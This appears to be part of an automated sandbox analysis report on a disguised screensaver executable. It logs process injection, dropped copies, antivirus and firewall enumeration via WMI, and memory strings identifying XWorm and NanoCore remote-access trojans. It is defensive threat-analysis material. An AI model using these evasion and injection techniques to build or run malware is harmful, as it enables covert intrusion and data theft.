Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, NativeMethods.cs Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ResourceReferenceValue.cs Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
Source: C:\Users\user\Desktop\new policy.scr.exe Memory written: C:\Users\user\Desktop\new policy.scr.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory written: C:\Users\user\AppData\Roaming\Networks!.exe base: 700000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory written: C:\Users\user\AppData\Roaming\Networks!.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\new policy.scr.exe Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"
Source: C:\Users\user\AppData\Roaming\Networks!.exe Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\AppData\Roaming\Networks!.exe Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000033E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q<
Source: new policy.scr.exe, 00000003.00000002.2865661587.000000000714B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager(
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003403000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q|>@
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q6k
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003430000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qD
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000339E000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000034EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qH
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qx5f
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q4
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000034EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qXGO
Source: new policy.scr.exe, 00000003.00000002.2862287242.000000000669C000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q4Ck
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q8
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000034AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q</N
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035C4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q\
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q`
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qHq
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qd
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003516000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000340A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q,mk
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q,#}
Source: new policy.scr.exe, 00000003.00000002.2879812341.0000000007ECC000.00000004.00000010.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2879987019.000000000800C000.00000004.00000010.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2832562480.000000000181E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program ManagerManager
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q,Me
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qP
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qhgo
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qT
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager0~S
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qX
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003511000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qP'Q
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003511000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q|
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003516000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qdXt
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qHQU
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qvd
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q4Zo
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^ql
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qTQd
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qp
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^ql\a
Source: new policy.scr.exe, 00000003.00000002.2865122228.0000000006D8E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program ManagerR
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qtGe
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qt
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qx
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000339E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q$':
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q,-u
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qLv{
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003554000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qH1X
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q,-k
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000340A000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerlB^q
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q(B|
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003566000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q("W
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^qT9`
Source: C:\Users\user\Desktop\new policy.scr.exe Queries volume information: C:\Users\user\Desktop\new policy.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\new policy.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Queries volume information: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe VolumeInformation
Source: C:\Users\user\Desktop\new policy.scr.exe Queries volume information: C:\Users\user\Desktop\new policy.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\new policy.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\new policy.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\new policy.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\new policy.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_07758C68 GetSystemTimes, 3_2_07758C68
Source: C:\Users\user\Desktop\new policy.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR
Source: Yara match File source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: airlineagancy.casacam.net 7076.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED

Remote Access Functionality

Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
